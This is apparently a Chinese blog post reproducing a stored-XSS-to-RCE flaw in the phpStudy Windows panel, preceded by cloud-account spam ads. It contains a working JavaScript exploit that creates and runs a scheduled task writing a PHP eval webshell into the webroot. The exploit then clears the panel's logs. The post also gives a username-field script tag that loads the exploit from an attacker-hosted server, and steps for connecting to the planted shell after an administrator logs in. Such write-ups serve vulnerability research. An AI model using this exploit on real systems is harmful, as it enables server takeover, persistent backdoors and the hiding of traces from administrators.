【漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
阿里云国内75折 回扣 微信号:monov8 |
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
文章目录
前言
本篇文章仅用于漏洞复现研究和学习切勿从事非法攻击行为切记
一、漏洞描述
Phpstudy小皮面板存在RCE漏洞通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
二、漏洞复现
首先去官网下载最新版的小皮Windows面板安装包程序
下载地址https://www.xp.cn/windows-panel.html
本地环境安装
安装完成之后会弹出一个txt文档里面包含访问地址如下所示
访问系统面板出现如下登录界面
首先在用户名登录的地方输入XSS代码验证是否存在漏洞
接着使用正确的账号密码进行登录加载完成之后出现弹窗。
如上图可以看到确实触发XSS弹窗这是因为整个系统在加载的过程中会读取操作日志的内容刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本所以执行显示了登录系统失败。
在当前这个系统界面上有一个计划任务的功能其中可以执行系统命令所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。
操作步骤如下
在本地使用python开启一个http服务并且将poc脚本放在服务目录下进行利用。
POC
function poc(){
$.get('/service/app/tasks.php?type=task_list',{},function(data){
var id=data.data[0].ID;
$.post('/service/app/tasks.php?type=exec_task',{
tid:id
},function(res2){
$.post('/service/app/log.php?type=clearlog',{
},function(res3){},"json");
},"json");
},"json");
}
function save(){
var data=new Object();
data.task_id="";
data.title="test";
data.exec_cycle="1";
data.week="1";
data.day="3";
data.hour="14";
data.minute = "20";
data.shell='echo "<?php @eval($_POST[123]);?>" >D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
$.post('/service/app/tasks.php?type=save_shell',data,function(res){
poc();
},'json');
}
save();
PS这里需要清空日志避免重复触发。
紧接着在登录处用户名框中插入如下代码
<script src=http://X.X.X.X:8000/poc.js></script>
操作完成后只要管理员登录到系统插入的XSS代码就可以写入计划任务并执行通过计划任务就可以在服务器上写入文件。
当管理员登录成功后就会在对应路径下产生一个 1.php文件(文件内容自行定义)
因为小皮windows面板这个应用系统类似于宝塔所以其中会部署网站
当文件写入完成后即可通过WebShell管理工具进行连接。